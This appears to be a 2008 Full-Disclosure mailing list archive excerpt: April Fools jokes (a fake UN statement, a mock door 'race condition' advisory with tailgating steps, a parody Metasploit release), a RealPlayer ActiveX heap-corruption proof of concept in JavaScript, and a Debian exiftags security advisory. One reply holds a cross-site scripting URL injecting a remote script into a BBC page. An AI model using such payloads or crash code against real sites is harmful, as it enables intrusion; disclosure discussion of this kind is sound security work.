http://www.securitylab.ru/news/extra/349440.php (English)

or

http://www.securitylab.ru/news/349441.php (Russian)

with links to BBC an un.org.



BR,

Valery Marchuk

www.SecurityLab.ru








From s.u.n at free.Fr  Tue Apr  1 11:18:14 2008
From: s.u.n at free.Fr (S/U/N)
Date: Tue, 01 Apr 2008 12:18:14 +0200
Subject: [Full-disclosure] UN against Open Source. Linux is a threat?
In-Reply-To: <627CE286524A4000B3318FDCF5074725@gw1>
References: <AB202291-2AD3-4AD3-AA36-D4217FFB2114@yahoo.com.ar>
	<627CE286524A4000B3318FDCF5074725@gw1>
Message-ID: <47F20BE6.7070604@free.Fr>

Nice1st of xss april!
http://www.bbc.co.uk/apps/ifl/fivelive/sportsquiz/quizengine?quiz=today&pagerType=pages%3Cscript%20src=http://www.securitylab.ru/test/1april.js%3E%3C/script%3E%3C!--&pagerData=1

Valery Marchuk a ?crit :
> BBC reports: Secretary-General Ban Ki-moon made an official statement 
> supporting Windows Vista and Windows Server 2008.
>
> "I believe a bug in OS Linux has allowed hackers to access Pentagon network 
> and steal classified national security information and place blame on China"", 
> said Ban Ki-moon
>
> More at
>
> http://www.securitylab.ru/news/extra/349440.php (English)
>
> or
>
> http://www.securitylab.ru/news/349441.php (Russian)
>
> with links to BBC an un.org.
>
>
>
> BR,
>
> Valery Marchuk
>
> www.SecurityLab.ru
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>   




From evilrabbi at gmail.com  Tue Apr  1 14:58:13 2008
From: evilrabbi at gmail.com (evilrabbi)
Date: Tue, 1 Apr 2008 08:58:13 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race
	Condition
In-Reply-To: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
References: <1207026022.3142.287.camel@localhost>
	<997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: <a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>

Why would you realease something like this without telling the vendor? What
you did is irresponsible.


On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters <nate.mcfeters at gmail.com>
wrote:

> Hahaha, nice find.
>
> On 4/1/08, I)ruid <druid at caughq.org> wrote:
> >
> >                      ____      ____     __    __
> >                     /    \    /    \   |  |  |  |
> >        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
> >                   |  |      |  |__|  | |  |  |  |
> >                   |  |  ___ |   __   | |  |  |  |
> > ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
> >                     \____/  |__|  |__|  \______/
> >
> >
> >                    Computer Academic Underground
> >                        http://www.caughq.org
> >                          Security Advisory
> >
> > ===============/========================================================
> > Advisory ID:    CAU-2008-0001
> > Release Date:   04/01/2008
> > Title:          Slowly Closing Door Race Condition
> > Application/OS: Physical Structures
> > Topic:          Physical structures employing exit doors with locks
> >                are vulnerable to a race condition.
> > Vendor Status:  Not Notified
> > Attributes:     Physical, Race Condition
> > Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
> > Author/Email:   CAU <advisories (at) caughq.org>
> > ===============/========================================================
> >
> > Overview
> > ========
> >
> > Physical structures which employ automatically locking doors to secure
> > exit points expose a race condition which may allow unauthorized entry.
> >
> >
> > Impact
> > ======
> >
> > Malicious outsiders may be able to enter a structure via an exit point.
> >
> > Exit points may additionally provide an exit from a secure area of the
> > structure, allowing an outsider entering through the exit point to gain
> > direct access to the secure area.
> >
> >
> > Affected Systems
> > ================
> >
> > Physical structures which employ automatically locking doors at exit
> > points of the structure.
> >
> >
> > Technical Explanation
> > =====================
> >
> > An exit's lock[1] generally converts a two-way door into a one-way
> > door, allowing a person to traverse the door's threshold in one
> > direction but not in the other.  These types of locks are used to
> > secure exit points of structures so that people may exit via the door
> > but not re-enter without disabling the lock through force or
> > authentication.
> >
> > When a person exits the structure through an exit point which is
> > secured by such a mechanism, a race condition exists wherein a
> > malicious outsider may be able to reach the door and enter through it
> > before it closes and locks itself.
> >
> > Many doors, especially heavier ones, also employ closing mechanisms[2]
> > which are designed to cause the door to close slowly so as not to slam
> > the door shut and damage the door frame, or damage any human appendage
> > which may be in between the door and it's frame.  Such closing
> > mechanisms can greatly increase the amount of time that the race
> > condition exists.
> >
> >
> > Solution & Recommendations
> > ==========================
> >
> > 1) Always ensure that personnel exiting an exit door wait outside the
> >   door until it has completely closed and locked before walking
> >   away.
> >
> > 2) Employ a double door system such as is used in an air-lock where
> >   the interior door must be secured prior to the exterior door being
> >   allowed to open.
> >
> >
> > Exploitation
> > ============
> >
> > First identify the exit point that you want to exploit.  Stand at a
> > safe distance during a high-traffic time and watch for people to use
> > the exit point.  Time how long it takes for the door to close and
> > lock itself when someone traverses the exit point.
> >
> > Next, identify a safe hiding place near the exit point, preferably
> > in a direction that would be behind a person exiting the door, but
> > which is within a distance to the exit point which you could traverse
> > in under the door's closing time at a brisk pace or run.
> >
> > Finally, hide in this location during a lower traffic time and wait
> > for someone to utilize the exit point.  After they have exited the
> > door and are walking away, run to the door and enter before it has
> > closed and locked.  Extra points are awarded for a spectacular dive
> > and/or roll to catch the door at the very last second.
> >
> >
> > References
> > ==========
> >
> > [1] http://en.wikipedia.org/wiki/Lock_%28device%29
> > [2] http://en.wikipedia.org/wiki/Door_closer
> >
> >
> > Credits & Gr33ts
> > ================
> >
> > Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214
> >
> >
> > --
> > I)ruid, C?ISSP
> > druid at caughq.org
> > http://druid.caughq.org
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
-- h0 h0 h0 --
www.nopsled.net
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/7c4543a1/attachment.html 

From razishaban at gmail.com  Tue Apr  1 15:22:55 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Tue, 1 Apr 2008 18:22:55 +0400
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race
	Condition
In-Reply-To: <a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
References: <1207026022.3142.287.camel@localhost>
	<997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
	<a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
Message-ID: <2d792fb20804010722g686e6b7aq8b9ea4b25cac91c4@mail.gmail.com>

April Fools!

--
Razi

On 4/1/08, evilrabbi <evilrabbi at gmail.com> wrote:
> Why would you realease something like this without telling the vendor? What
> you did is irresponsible.
>
>
>
> On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters <nate.mcfeters at gmail.com>
> wrote:
>
> > Hahaha, nice find.
> >
> >
> > On 4/1/08, I)ruid <druid at caughq.org> wrote:
> > >                      ____      ____     __    __
> > >                     /    \    /    \   |  |  |  |
> > >        ----====####/  /\__\##/  /\  \##|  |##|
> |####====----
> > >                   |  |      |  |__|  | |  |  |  |
> > >                   |  |  ___ |   __   | |  |  |  |
> > > ------======######\  \/  /#|  |##|  |#|  |##|
> |######======------
> > >                     \____/  |__|  |__|  \______/
> > >
> > >
> > >
> > >
> > >                    Computer Academic Underground
> > >                        http://www.caughq.org
> > >                          Security Advisory
> > >
> > >
> ===============/========================================================
> > > Advisory ID:    CAU-2008-0001
> > > Release Date:   04/01/2008
> > > Title:          Slowly Closing Door Race Condition
> > > Application/OS: Physical Structures
> > > Topic:          Physical structures employing exit doors with locks
> > >                are vulnerable to a race condition.
> > > Vendor Status:  Not Notified
> > > Attributes:     Physical, Race Condition
> > > Advisory URL:
> http://www.caughq.org/advisories/CAU-2008-0001.txt
> > > Author/Email:   CAU <advisories (at) caughq.org>
> > >
> ===============/========================================================
> > >
> > > Overview
> > > ========
> > >
> > > Physical structures which employ automatically locking doors to secure
> > > exit points expose a race condition which may allow unauthorized entry.
> > >
> > >
> > > Impact
> > > ======
> > >
> > > Malicious outsiders may be able to enter a structure via an exit point.
> > >
> > > Exit points may additionally provide an exit from a secure area of the
> > > structure, allowing an outsider entering through the exit point to gain
> > > direct access to the secure area.
> > >
> > >
> > > Affected Systems
> > > ================
> > >
> > > Physical structures which employ automatically locking doors at exit
> > > points of the structure.
> > >
> > >
> > > Technical Explanation
> > > =====================
> > >
> > > An exit's lock[1] generally converts a two-way door into a one-way
> > > door, allowing a person to traverse the door's threshold in one
> > > direction but not in the other.  These types of locks are used to
> > > secure exit points of structures so that people may exit via the door
> > > but not re-enter without disabling the lock through force or
> > > authentication.
> > >
> > > When a person exits the structure through an exit point which is
> > > secured by such a mechanism, a race condition exists wherein a
> > > malicious outsider may be able to reach the door and enter through it
> > > before it closes and locks itself.
> > >
> > > Many doors, especially heavier ones, also employ closing mechanisms[2]
> > > which are designed to cause the door to close slowly so as not to slam
> > > the door shut and damage the door frame, or damage any human appendage
> > > which may be in between the door and it's frame.  Such closing
> > > mechanisms can greatly increase the amount of time that the race
> > > condition exists.
> > >
> > >
> > > Solution & Recommendations
> > > ==========================
> > >
> > > 1) Always ensure that personnel exiting an exit door wait outside the
> > >   door until it has completely closed and locked before walking
> > >   away.
> > >
> > > 2) Employ a double door system such as is used in an air-lock where
> > >   the interior door must be secured prior to the exterior door being
> > >   allowed to open.
> > >
> > >
> > > Exploitation
> > > ============
> > >
> > > First identify the exit point that you want to exploit.  Stand at a
> > > safe distance during a high-traffic time and watch for people to use
> > > the exit point.  Time how long it takes for the door to close and
> > > lock itself when someone traverses the exit point.
> > >
> > > Next, identify a safe hiding place near the exit point, preferably
> > > in a direction that would be behind a person exiting the door, but
> > > which is within a distance to the exit point which you could traverse
> > > in under the door's closing time at a brisk pace or run.
> > >
> > > Finally, hide in this location during a lower traffic time and wait
> > > for someone to utilize the exit point.  After they have exited the
> > > door and are walking away, run to the door and enter before it has
> > > closed and locked.  Extra points are awarded for a spectacular dive
> > > and/or roll to catch the door at the very last second.
> > >
> > >
> > > References
> > > ==========
> > >
> > > [1] http://en.wikipedia.org/wiki/Lock_%28device%29
> > > [2] http://en.wikipedia.org/wiki/Door_closer
> > >
> > >
> > > Credits & Gr33ts
> > > ================
> > >
> > > Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214
> > >
> > >
> > > --
> > > I)ruid, C?ISSP
> > > druid at caughq.org
> > > http://druid.caughq.org
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> > >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> -- h0 h0 h0 --
> www.nopsled.net
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From elazar at hushmail.com  Tue Apr  1 15:28:47 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 01 Apr 2008 10:28:47 -0400
Subject: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game
Message-ID: <20080401142847.BCC6CD01A3@mailserver10.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Let the foolz begin :) Happy April 1st!

On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION
<fdlist at digitaloffense.net> wrote:
>FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)
>
>    METASPLOIT CORPORATION ANNOUNCES VERSION 4.0
>OF THE METASPLOIT FRAMEWORK WITH EXCITING FEATURES
>       AND A CLOSED SOURCE LICENSE AGREEMENT.
>
>After over a year and a half in stealth-mode, Metasploit
>Corporation has announced
>the 4.0 release of their flag-ship product, The Metasploit
>Framework.  The new
>release comes jam-packed with exciting features that are sure to
>please even
>the German legal system.  The following brief list includes some
>of the more
>fantastic changes.
>
>PWNCRAFT!
>
>Tired of fighting the good fight with the tried and true user
>interfaces you've
>come to expect from exploitation frameworks?  Seeing a command
>shell for the
>5000th time got you down?  Well, you're in luck.  Metasploit has
>decided to
>return to its rootz in '08 and focus on the exploitation-as-a-game
>model.
>PwnCraft brings the worlds of ownage and pwnage together for the
>first time in
>a revolutionary Real Time Strategy (RTS) world.  Don't be fooled
>by the
>game-like interface, though!  The actions you take in PwnCraft
>have a real
>effect on the world around you!  Here's just a taste of some of
>the absolutely
>insane features you can look forward to:
>
>  - Glide through enemy networks with a squadron of elegant winged
>pwnies
>  - Launch devastating attacks against enemy ports in an all-out
>IPS-evading
>    TCP/IP assault
>  - Use the fuzzy Burrowing Badger unit to discover 0day flaws in
>enemy
>    defenses
>  - Conqueer cities and installing agents who can sabotage and
>smuggle other
>    units to new Vistas
>  - An entirely in-game interface to the vulnerability sharing
>market to
>    improve your arsenal on the fly!
>  - AND MORE!
>
>Beta testing of PwnCraft is currently underway and we are hoping
>to begin
>releasing it in stores at a retail price of $49.99 in Q3 2009.
>More details
>about the game can be found on the Metasploit website:
>
>http://metasploit.com/
>
>
>CLOSED SOURCE LICENSE
>
>After years of struggling to define Metasploit's licensing
>position a final
>decision has been made to "screw it" and move the framework to a
>closed source
>license agreement.  The decision was made to sell out for a number
>of reasons,
>not the least of which has to do with the benjamins.  Metasploit
>2.x and 3.x
>will no longer be available for public download.
>
>SPLOIT AT ME
>
>Get the latest exploits from Metasploit's patent-pending Sploit At
>Me service
>that delivers exploits on demand.  You can rest assured that
>Metasploit's
>Sploit At Me service will attempt to compromise machines of your
>choosing with
>*99% reliability.
>
>About Metasploit Corporation
>
>Metasploit Corporation is an industry leader with thousands of non-
>paying
>customers world-wide.  Metasploit delivers high-quality, top-
>notch,
>success-driven exploits to the security world as one-stop-shop
>exploitation
>framework.
>
>
>  * The other 1% of the time, your own machine will be
>compromised.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkfyRp8ACgkQi04xwClgpZgvQwP+P5O3dPIIu3t/aOJo8ufryik2p4BS
J1xM7129LTFPfwNgx2lnBEAbLvLSAUMcgRaHBD0HJ+u6r/mxLJd7S0XFYRDjFGJ6PTYE
i7/HRYmIQAXY1ENCyBHPvADGs7Ivj4x4sfcGN7OoeOcDyufqm0DC6LMkatQUxKu+lLoF
7yhhn9U=
=j0A2
-----END PGP SIGNATURE-----

--
Click here for free info on Graduate Degrees.
http://tagline.hushmail.com/fc/Ioyw6h4eSposADR0PtOIVVC5EPU4F30Wlhs3UJjIvS4qQsdD3pzBWo/



From elazar at hushmail.com  Tue Apr  1 16:46:34 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 01 Apr 2008 11:46:34 -0400
Subject: [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap
	Corruption
Message-ID: <20080401154635.1A3551A0039@mailserver8.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Now that this is patched...

http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/
browser/realplayer_console.rb

Elazar


On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad
<elazar at hushmail.com> wrote:
>Who:
>Real Networks
>http://www.real.com
>
>What:
>Real Networks Real Player is a popular media player.
>
>How:
>Real Player utilizes an ActiveX control to play content within the
>users browser.
>
>rmoc3260.dll version 6.0.10.45
>{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
>{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}
>
>It is possible to modify heap blocks after they are freed and
>overwrite certain registers, possibly allowing code execution.
>Like
>so:
>
>------------
>var buf = '';
>while (buf.length < 1005) buf = buf + 'A';
>
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m
>
>//repeat
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m --> Should crash here
>-------------
>
>Workaround:
>Set the killbit for this control. See
>http://support.microsoft.com/kb/240797
>
>Fix:
>No official fix known
>
>Exploit:
>Working on it
>
>Elazar
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkfyWNoACgkQi04xwClgpZgyVgP+N7kKGC7cD/1qnnauXIi30j+fmEbK
sIe+tOWjTSUKcoTZsoFLiQYd3tKu/t+mauZSi1msUaPgjHu1Or/laRU3Wgw008lnLAmC
lT4O/tjlZP6luuzxCHyDrY6p5ze4sb4uDukKnGVHqpNMDoK/s0TFD/fZiaBdc7ZFvL9o
4Y6w7ZY=
=IpM9
-----END PGP SIGNATURE-----

--
Click here for free info on Graduate Degrees.
http://tagline.hushmail.com/fc/Ioyw6h4eSposuNJokZ1ABDCgGd9ckObZCsDzUVQlPhlov4Mrkal8uM/



From DAVID.G.WESTON at saic.com  Tue Apr  1 16:49:03 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Tue, 01 Apr 2008 08:49:03 -0700
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race
 Condition
In-Reply-To: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: <C417A77F.3864%david.g.weston@saic.com>

I saw Nate do a 0day sploit on this at the Hard Rock Amsterdam!


On 3/31/08 10:18 PM, "Nate McFeters" <nate.mcfeters at gmail.com> wrote:

> Hahaha, nice find.
> 
> On 4/1/08, I)ruid <druid at caughq.org> wrote:
>>                      ____      ____     __    __
>>                     /    \    /    \   |  |  |  |
>>        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
>>                   |  |      |  |__|  | |  |  |  |
>>                   |  |  ___ |   __   | |  |  |  |
>> ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
>>                     \____/  |__|  |__|  \______/
>> 
>>                    Computer Academic Underground
>>                        http://www.caughq.org
>>                          Security Advisory
>> 
>> ===============/========================================================
>> Advisory ID:    CAU-2008-0001
>> Release Date:   04/01/2008
>> Title:          Slowly Closing Door Race Condition
>> Application/OS: Physical Structures
>> Topic:          Physical structures employing exit doors with locks
>>                are vulnerable to a race condition.
>> Vendor Status:  Not Notified
>> Attributes:     Physical, Race Condition
>> Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
>> Author/Email:   CAU <advisories (at) caughq.org <http://caughq.org> >
>> ===============/========================================================
>> 
>> Overview
>> ========
>> 
>> Physical structures which employ automatically locking doors to secure
>> exit points expose a race condition which may allow unauthorized entry.
>> 
>> 
>> Impact
>> ======
>> 
>> Malicious outsiders may be able to enter a structure via an exit point.
>> 
>> Exit points may additionally provide an exit from a secure area of the
>> structure, allowing an outsider entering through the exit point to gain
>> direct access to the secure area.
>> 
>> 
>> Affected Systems
>> ================
>> 
>> Physical structures which employ automatically locking doors at exit
>> points of the structure.
>> 
>> 
>> Technical Explanation
>> =====================
>> 
>> An exit's lock[1] generally converts a two-way door into a one-way
>> door, allowing a person to traverse the door's threshold in one
>> direction but not in the other.  These types of locks are used to
>> secure exit points of structures so that people may exit via the door
>> but not re-enter without disabling the lock through force or
>> authentication.
>> 
>> When a person exits the structure through an exit point which is
>> secured by such a mechanism, a race condition exists wherein a
>> malicious outsider may be able to reach the door and enter through it
>> before it closes and locks itself.
>> 
>> Many doors, especially heavier ones, also employ closing mechanisms[2]
>> which are designed to cause the door to close slowly so as not to slam
>> the door shut and damage the door frame, or damage any human appendage
>> which may be in between the door and it's frame.  Such closing
>> mechanisms can greatly increase the amount of time that the race
>> condition exists.
>> 
>> 
>> Solution & Recommendations
>> ==========================
>> 
>> 1) Always ensure that personnel exiting an exit door wait outside the
>>   door until it has completely closed and locked before walking
>>   away.
>> 
>> 2) Employ a double door system such as is used in an air-lock where
>>   the interior door must be secured prior to the exterior door being
>>   allowed to open.
>> 
>> 
>> Exploitation
>> ============
>> 
>> First identify the exit point that you want to exploit.  Stand at a
>> safe distance during a high-traffic time and watch for people to use
>> the exit point.  Time how long it takes for the door to close and
>> lock itself when someone traverses the exit point.
>> 
>> Next, identify a safe hiding place near the exit point, preferably
>> in a direction that would be behind a person exiting the door, but
>> which is within a distance to the exit point which you could traverse
>> in under the door's closing time at a brisk pace or run.
>> 
>> Finally, hide in this location during a lower traffic time and wait
>> for someone to utilize the exit point.  After they have exited the
>> door and are walking away, run to the door and enter before it has
>> closed and locked.  Extra points are awarded for a spectacular dive
>> and/or roll to catch the door at the very last second.
>> 
>> 
>> References
>> ==========
>> 
>> [1] http://en.wikipedia.org/wiki/Lock_%28device%29
>> [2] http://en.wikipedia.org/wiki/Door_closer
>> 
>> 
>> Credits & Gr33ts
>> ================
>> 
>> Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214
>> 
>> 
>> --
>> I)ruid, C?ISSP
>> druid at caughq.org
>> http://druid.caughq.org
>> 
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> 
>> 
>> 
>> 
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> 
>> Thanks,
>> David Weston
>> Security Engineer
>> Science Application International Corporation
>> Web:  http://www.saic.com/infosec
>> Email:DAVID.G.WESTON at saic.com
>> Office:858-826-5435
>> Cell:   310-866-9713

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/4f4cce11/attachment.html 

From devin at debian.org  Tue Apr  1 08:54:38 2008
From: devin at debian.org (Devin Carraway)
Date: Tue,  1 Apr 2008 09:54:38 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1533-2] New exiftags packages fix
	several vulnerabilities
Message-ID: <20080401075438.B19CE326A9E@morgana.loeki.tv>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1533-2                  security at debian.org
http://www.debian.org/security/                           Devin Carraway
April 01, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : exiftags
Vulnerability  : insufficient input sanitizing
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-6354 CVE-2007-6355 CVE-2007-6356
Debian Bug     : 457062

Christian Schmid and Meder Kydyraliev (Google Security) discovered a
number of vulnerabilities in exiftags, a utility for extracting EXIF
metadata from JPEG images. This update merely adds the packages for
Debian 3.1 sarge (oldstable) which were missing in the previous DSA.

The Common Vulnerabilities and Exposures project identified the
following three problems:

CVE-2007-6354

    Inadequate EXIF property validation could lead to invalid memory
    accesses if executed on a maliciously crafted image, potentially
    including heap corruption and the execution of arbitrary code.

CVE-2007-6355

    Flawed data validation could lead to integer overflows, causing
    other invalid memory accesses, also with the potential for memory
    corruption or arbitrary code execution.

CVE-2007-6356

    Cyclical EXIF image file directory (IFD) references could cause
    a denial of service (infinite loop).

For the stable distribution (etch), these problems have been fixed in
version 0.98-1.1+etch1.

For the oldstable distribution (sarge), these problems have been fixed
in version 0.98-1.1+0sarge1.

For the unstable distribution (sid), these problems have been fixed in
version 1.01-0.1.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1.diff.gz
    Size/MD5 checksum:     5131 3baa30a42f531580a502a3f3818ead56
  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98.orig.tar.gz
    Size/MD5 checksum:    50195 5a8a4057c4dac1d765da5f9ef4527bdf
  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1.dsc
    Size/MD5 checksum:      873 b85e0a4a382cac6a844af52e42c670bb

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_alpha.deb
    Size/MD5 checksum:    63406 d4b9ee67dcfb07ef1bc6ab143bd50496

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_amd64.deb
    Size/MD5 checksum:    56656 83688a1b3ec9c359a734f04bb985350d

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_arm.deb
    Size/MD5 checksum:    56064 eb60a8336c020a588458bb07fb57c1bc

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_hppa.deb
    Size/MD5 checksum:    59824 be52ea467c6651b65a371895948005b4

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_i386.deb
    Size/MD5 checksum:    52514 1850fa2d6b54fe1029553605509ef7cf

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_ia64.deb
    Size/MD5 checksum:    76252 ce03fb64e959c8a2f24ad3744ca80fd5

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_m68k.deb
    Size/MD5 checksum:    53120 8c98a08982680a42e1c6aab585faf487

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_mips.deb
    Size/MD5 checksum:    60736 14cbe8b15c5260b969961cf4107da991

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_mipsel.deb
    Size/MD5 checksum:    60040 3bdbbf546125a75c00800cb4039b25ab

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_powerpc.deb
    Size/MD5 checksum:    54812 8d33fe8cb068bf1f02ce0c4a8cd3c8d0

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_s390.deb
    Size/MD5 checksum:    58208 9e7eeadcaefc2fe90aa11ece173348e2


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1.dsc
    Size/MD5 checksum:      577 7b8743189acd9b4c0a7a25cabb5b753d
  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1.diff.gz
    Size/MD5 checksum:     5128 2f82244bd73046f31b07e77a7381dd15
  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98.orig.tar.gz
    Size/MD5 checksum:    50195 5a8a4057c4dac1d765da5f9ef4527bdf

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_alpha.deb
    Size/MD5 checksum:    62970 e481f4f8ce70b25a648a2d3678d48e07

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_amd64.deb
    Size/MD5 checksum:    57924 a5a6906e8d05beeffc763379a9c45ba2

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_arm.deb
    Size/MD5 checksum:    56278 b06bf3f7722f034096719c7153fae5bd

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_i386.deb
    Size/MD5 checksum:    52558 ceed89333fd99a11d26765390ae35871

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_ia64.deb
    Size/MD5 checksum:    75164 ca893189af6fe68536774bac7dd357a1

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_mips.deb
    Size/MD5 checksum:    61010 a5415b5fb389903c20c431a245fcb3fb

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_mipsel.deb
    Size/MD5 checksum:    60064 2961a652e3cb269a0671fe2281b2f017

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_powerpc.deb
    Size/MD5 checksum:    54734 23a4389bb781e0a054c1687986ac1b1a

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_s390.deb
    Size/MD5 checksum:    58988 38bf328294b2afe633ef99a5b97f3f1e

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_sparc.deb
    Size/MD5 checksum:    56132 d2e1cd3190fe528527beaacc2ef6be3f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
